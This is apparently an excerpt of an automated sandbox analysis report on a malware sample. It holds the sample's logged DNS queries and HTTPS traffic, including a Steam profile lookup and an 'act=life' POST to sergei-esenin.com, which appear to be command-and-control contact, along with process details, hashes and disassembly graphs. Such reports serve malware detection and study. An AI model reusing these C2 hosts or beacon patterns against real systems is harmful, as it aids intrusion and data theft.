                                                                                                                                                          Oct 11, 2024 13:45:04.226700068 CEST1.1.1.1192.168.2.60xfec7Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.236187935 CEST1.1.1.1192.168.2.60x6a97Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.245610952 CEST1.1.1.1192.168.2.60x8041No error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:05.500901937 CEST1.1.1.1192.168.2.60xfe7aNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:05.500901937 CEST1.1.1.1192.168.2.60xfe7aNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • steamcommunity.com
                                                                                                                                                          • sergei-esenin.com

                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.64971023.192.247.894432096C:\Users\user\Desktop\file.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-10-11 11:45:04 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                          2024-10-11 11:45:05 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Date: Fri, 11 Oct 2024 11:45:05 GMT
                                                                                                                                                          Content-Length: 34837
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: sessionid=dac87a6c63272387c8965f1e; Path=/; Secure; SameSite=None
                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                          2024-10-11 11:45:05 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                          2024-10-11 11:45:05 UTC10062INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                          Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                          2024-10-11 11:45:05 UTC10261INData Raw: 74 3b 56 49 44 45 4f 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 76 69 64 65 6f 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74
                                                                                                                                                          Data Ascii: t;VIDEO_CDN_URL&quot;:&quot;https:\/\/video.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_URL&quot;:&quot;https:\/\/community.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunit


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.649711172.67.206.2044432096C:\Users\user\Desktop\file.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-10-11 11:45:05 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 8
                                                                                                                                                          Host: sergei-esenin.com
                                                                                                                                                          2024-10-11 11:45:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                          2024-10-11 11:45:06 UTC825INHTTP/1.1 200 OK
                                                                                                                                                          Date: Fri, 11 Oct 2024 11:45:06 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=4ui2719pho2auj5p5bikg38tc0; expires=Tue, 04 Feb 2025 05:31:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6G9RdNvNN7nHQKjRsRRdYWO3X0ni4OCI5Q8JtCFHjn%2BrEpkNETr23Js2FvaummPKX6TGCbvvgfUTKc414rlp8ss2JYnPfK7BoXhPJKj3rpDWlXB33%2Bht8UY77Yc1QBZRBR0yRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8d0e9a1cd9ef1971-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-10-11 11:45:06 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                          2024-10-11 11:45:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:07:45:01
                                                                                                                                                          Start date:11/10/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                          Imagebase:0xb90000
                                                                                                                                                          File size:1'863'168 bytes
                                                                                                                                                          MD5 hash:D28A43B3DBCE6278477CC5696847850A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:1%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:55.1%
                                                                                                                                                            Total number of Nodes:49
                                                                                                                                                            Total number of Limit Nodes:5
                                                                                                                                                            execution_graph 21237 bd673d 21239 bd66aa 21237->21239 21238 bd6793 21239->21238 21242 bd5bb0 LdrInitializeThunk 21239->21242 21241 bd67b3 21242->21241 21243 ba049b 21247 ba0227 21243->21247 21244 ba0455 21250 bd5700 RtlFreeHeap 21244->21250 21247->21244 21248 ba0308 21247->21248 21249 bd5700 RtlFreeHeap 21247->21249 21249->21244 21250->21248 21251 bd64b8 21253 bd63f2 21251->21253 21252 bd646e 21253->21252 21255 bd5bb0 LdrInitializeThunk 21253->21255 21255->21252 21261 bd50fa 21262 bd5176 LoadLibraryExW 21261->21262 21264 bd514c 21261->21264 21263 bd518c 21262->21263 21264->21262 21265 b9d110 21267 b9d119 21265->21267 21266 b9d2ee ExitProcess 21267->21266 21268 bd95b0 21269 bd95d0 21268->21269 21269->21269 21270 bd970e 21269->21270 21272 bd5bb0 LdrInitializeThunk 21269->21272 21272->21270 21281 bd60d2 21283 bd60fa 21281->21283 21282 bd614e 21286 bd5bb0 LdrInitializeThunk 21282->21286 21283->21282 21287 bd5bb0 LdrInitializeThunk 21283->21287 21286->21282 21287->21282 21288 bd626a 21290 bd628d 21288->21290 21289 bd636e 21292 bd62de 21290->21292 21295 bd5bb0 LdrInitializeThunk 21290->21295 21292->21289 21294 bd5bb0 LdrInitializeThunk 21292->21294 21294->21289 21295->21292 21296 bcd9cb 21298 bcd9fb 21296->21298 21297 bcda65 21298->21297 21300 bd5bb0 LdrInitializeThunk 21298->21300 21300->21298 21301 b9fca0 21302 b9fcdc 21301->21302 21304 b9ffe4 21302->21304 21305 bd3220 21302->21305 21306 bd32ac 21305->21306 21307 bd32a2 RtlFreeHeap 21305->21307 21308 bd3236 21305->21308 21306->21304 21307->21306 21308->21307 21309 bd3202 RtlAllocateHeap

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00BD50FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63libraryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 25 bd50fa-bd514a 26 bd514c-bd514f 25->26 27 bd5176-bd5186 LoadLibraryExW 25->27 30 bd5150-bd5174 call bd5a50 26->30 28 bd518c-bd51b5 27->28 29 bd52d8-bd5304 27->29 28->29 30->27
                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(19A41BB1,00000000,00000800), ref: 00BD5182
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID: <I$)$<I$)$@^
                                                                                                                                                            • API String ID: 1029625771-935358343
                                                                                                                                                            • Opcode ID: 7e043b0026ae88153263b06c0d5095e39d176f224b2194957846830d1e549952
                                                                                                                                                            • Instruction ID: 2c7c233b9e9f89b757a7d9f4a4d6d809faa653e82f54261a620f571417ca9d45
                                                                                                                                                            • Opcode Fuzzy Hash: 7e043b0026ae88153263b06c0d5095e39d176f224b2194957846830d1e549952
                                                                                                                                                            • Instruction Fuzzy Hash: 28216D351083848FC310DF68D8D5B6AFBF4AB6A300F69482CE1C5D7352EB76D9158B56
                                                                                                                                                            Function 00B9FCA0 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 33 b9fca0-b9fcda 34 b9fd0b-b9fe22 33->34 35 b9fcdc-b9fcdf 33->35 37 b9fe5b-b9fe8c 34->37 38 b9fe24 34->38 36 b9fce0-b9fd09 call ba2690 35->36 36->34 39 b9fe8e-b9fe8f 37->39 40 b9feb6-b9fecf call ba0b50 37->40 42 b9fe30-b9fe59 call ba2760 38->42 43 b9fe90-b9feb4 call ba2700 39->43 51 b9fed5-b9fef8 40->51 52 b9ffe4-b9ffe6 40->52 42->37 43->40 53 b9ff2b-b9ff2d 51->53 54 b9fefa 51->54 55 ba01b1-ba01bb 52->55 57 b9ff30-b9ff3a 53->57 56 b9ff00-b9ff29 call ba27e0 54->56 56->53 59 b9ff3c-b9ff3f 57->59 60 b9ff41-b9ff49 57->60 59->57 59->60 61 b9ff4f-b9ff76 60->61 62 ba01a2-ba01a5 call bd3220 60->62 64 b9ff78 61->64 65 b9ffab-b9ffb5 61->65 70 ba01aa-ba01ad 62->70 67 b9ff80-b9ffa9 call ba2840 64->67 68 b9ffeb 65->68 69 b9ffb7-b9ffbb 65->69 67->65 71 b9ffed-b9ffef 68->71 73 b9ffc7-b9ffcb 69->73 70->55 74 ba019a 71->74 75 b9fff5-ba002c 71->75 73->74 77 b9ffd1-b9ffd8 73->77 74->62 78 ba005b-ba0065 75->78 79 ba002e-ba002f 75->79 80 b9ffda-b9ffdc 77->80 81 b9ffde 77->81 83 ba0067-ba006f 78->83 84 ba00a4 78->84 82 ba0030-ba0059 call ba28a0 79->82 80->81 85 b9ffc0-b9ffc5 81->85 86 b9ffe0-b9ffe2 81->86 82->78 88 ba0087-ba008b 83->88 89 ba00a6-ba00a8 84->89 85->71 85->73 86->85 88->74 92 ba0091-ba0098 88->92 89->74 90 ba00ae-ba00c5 89->90 93 ba00fb-ba0102 90->93 94 ba00c7 90->94 95 ba009a-ba009c 92->95 96 ba009e 92->96 98 ba0130-ba013c 93->98 99 ba0104-ba010d 93->99 97 ba00d0-ba00f9 call ba2900 94->97 95->96 100 ba0080-ba0085 96->100 101 ba00a0-ba00a2 96->101 97->93 104 ba01c2-ba01c7 98->104 103 ba0117-ba011b 99->103 100->88 100->89 101->100 103->74 106 ba011d-ba0124 103->106 104->62 107 ba012a 106->107 108 ba0126-ba0128 106->108 109 ba012c-ba012e 107->109 110 ba0110-ba0115 107->110 108->107 109->110 110->103 111 ba0141-ba0143 110->111 111->74 112 ba0145-ba015b 111->112 112->104 113 ba015d-ba015f 112->113 114 ba0163-ba0166 113->114 115 ba0168-ba0188 call ba2030 114->115 116 ba01bc 114->116 119 ba018a-ba0190 115->119 120 ba0192-ba0198 115->120 116->104 119->114 119->120 120->104
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: J|BJ$V$VY^_$t
                                                                                                                                                            • API String ID: 0-3701112211
                                                                                                                                                            • Opcode ID: e3270ea75323cfb1b6ed05033f02c94c74dcc671b3b218b2fe75fb420adec000
                                                                                                                                                            • Instruction ID: a7760e4e734d9a6812724e5d1064da9bf1a6143cf84d3ec0146453eccf2d73a1
                                                                                                                                                            • Opcode Fuzzy Hash: e3270ea75323cfb1b6ed05033f02c94c74dcc671b3b218b2fe75fb420adec000
                                                                                                                                                            • Instruction Fuzzy Hash: EAD1787551C3819BD710EF18949066FBBE1EF96B44F1888ACF4C99B252C336CD09DB92
                                                                                                                                                            Function 00B9D110 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 157 b9d110-b9d11b call bd4cc0 160 b9d2ee-b9d2f6 ExitProcess 157->160 161 b9d121-b9d130 call bcc8d0 157->161 165 b9d2e9 call bd56e0 161->165 166 b9d136-b9d15f 161->166 165->160 170 b9d161 166->170 171 b9d196-b9d1bf 166->171 172 b9d170-b9d194 call b9d300 170->172 173 b9d1c1 171->173 174 b9d1f6-b9d20c 171->174 172->171 175 b9d1d0-b9d1f4 call b9d370 173->175 176 b9d239-b9d23b 174->176 177 b9d20e-b9d20f 174->177 175->174 181 b9d23d-b9d25a 176->181 182 b9d286-b9d2aa 176->182 180 b9d210-b9d237 call b9d3e0 177->180 180->176 181->182 186 b9d25c-b9d25f 181->186 187 b9d2ac-b9d2af 182->187 188 b9d2d6 call b9e8f0 182->188 192 b9d260-b9d284 call b9d440 186->192 189 b9d2b0-b9d2d4 call b9d490 187->189 194 b9d2db-b9d2dd 188->194 189->188 192->182 194->165 197 b9d2df-b9d2e4 call ba2f10 call ba0b40 194->197 197->165
                                                                                                                                                            APIs
                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00B9D2F0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                            • Opcode ID: 9590ec2d0fe6ab953c9cafc49c0861f408aa2d132815b1ce56ec76831c9da2ec
                                                                                                                                                            • Instruction ID: fd076657b85f0a1d20b4586029053e420d594f35409b724331f8907a9c42dbc6
                                                                                                                                                            • Opcode Fuzzy Hash: 9590ec2d0fe6ab953c9cafc49c0861f408aa2d132815b1ce56ec76831c9da2ec
                                                                                                                                                            • Instruction Fuzzy Hash: 8B41357440D340ABCB01BB69D684A2EFBF5EF52745F548CACE5C49B212C336D8148B6B
                                                                                                                                                            Function 00BD5BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 212 bd5bb0-bd5be2 LdrInitializeThunk
                                                                                                                                                            APIs
                                                                                                                                                            • LdrInitializeThunk.NTDLL(00BD973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 00BD5BDE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                            Function 00BD695B Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 241 bd695b-bd696b call bd4a20 244 bd696d 241->244 245 bd6981-bd6a02 241->245 246 bd6970-bd697f 244->246 247 bd6a04 245->247 248 bd6a36-bd6a42 245->248 246->245 246->246 249 bd6a10-bd6a34 call bd73e0 247->249 250 bd6a85-bd6a9f 248->250 251 bd6a44-bd6a4f 248->251 249->248 253 bd6a50-bd6a57 251->253 254 bd6a59-bd6a5c 253->254 255 bd6a60-bd6a66 253->255 254->253 257 bd6a5e 254->257 255->250 258 bd6a68-bd6a7d call bd5bb0 255->258 257->250 260 bd6a82 258->260 260->250
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
